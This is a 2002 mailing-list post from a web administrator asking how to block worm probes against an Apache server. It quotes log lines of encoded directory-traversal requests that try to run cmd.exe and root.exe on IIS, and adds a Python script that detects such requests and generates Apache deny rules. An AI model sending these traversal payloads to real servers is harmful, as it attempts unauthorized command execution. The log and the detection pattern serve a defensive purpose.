[Techtalk] outlook virii
Davis, Jennifer
JDavis at JUSTICE.GC.CA
Fri Apr 12 17:20:09 EST 2002
Hi:
I was wondering if it was possible to send some sort of message back
to people (like maybe a popup message) when they hit my webserver that
surfing with viruses on their system is just not cool. See an excerpt from my
log below. I estimate that 95% of the hits to my web server are these
exploit attempts. Barring that, is there a way to block an IP that, we'll say,
is looking for root.exe? The webserver is a standard Apache 1.3? that came
with Slackware 8.0.
Thanks again
Jenn
Jennifer Davis
Constitutional & Administrative Law - Droit administratif & constitutionnel
Department of Justice Canada - Ministère de la Justice du Canada
*(613) 957-4963 - fx (613) 941-1937
*jdavis at justice.gc.ca
64.168.22.13 - - [10/Apr/2002:17:10:57 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:10:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP$
64.168.22.13 - - [10/Apr/2002:17:11:02 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:03 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
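
One way to approach the blocking question from the access log itself, as an added example that is not part of the original post: it counts requests per client whose target, after layered percent-decoding, asks for root.exe or cmd.exe or contains a `..\` or `../` traversal, and prints Apache `Deny from` lines for repeat offenders. The signature list, the threshold and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*"')
# Hypothetical signature list, modelled on the request targets in the post's log.
PROBE_RE = re.compile(r'(root|cmd)\.exe|\.\.[\\/]')

def decode_layers(target, max_rounds=3):
    """Percent-decode repeatedly so %255c -> %5c -> backslash becomes visible."""
    for _ in range(max_rounds):
        decoded = unquote(target, encoding="latin-1")
        if decoded == target:
            break
        target = decoded
    return target.lower()

def probe_counts(lines):
    """Count probe requests per client address; unparsable lines are skipped."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and PROBE_RE.search(decode_layers(m.group(2))):
            hits[m.group(1)] += 1
    return hits

def deny_lines(lines, threshold=3):
    """Build mod_access 'Deny from' directives for clients at or over threshold."""
    counts = probe_counts(lines)
    return [f"Deny from {ip}" for ip in sorted(counts) if counts[ip] >= threshold]

# Constructed sample in the shape of the post's log (documentation-range addresses).
SAMPLE = [
    '192.0.2.10 - - [10/Apr/2002:17:10:57 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1601',
    '192.0.2.10 - - [10/Apr/2002:17:11:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601',
    '192.0.2.10 - - [10/Apr/2002:17:11:05 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285',
    '192.0.2.10 - - [10/Apr/2002:17:11:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601',
    '198.51.100.7 - - [10/Apr/2002:17:12:00 -0400] "GET /index.html HTTP/1.0" 200 5120',
    '203.0.113.5 - - [10/Apr/2002:17:13:00 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1601',
]

if __name__ == "__main__":
    print("\n".join(deny_lines(SAMPLE)))
```

The printed directives would go inside a `<Directory>` or `<Location>` block that already has `Order allow,deny` and `Allow from all`; since infected hosts change constantly, the list needs regenerating from fresh logs.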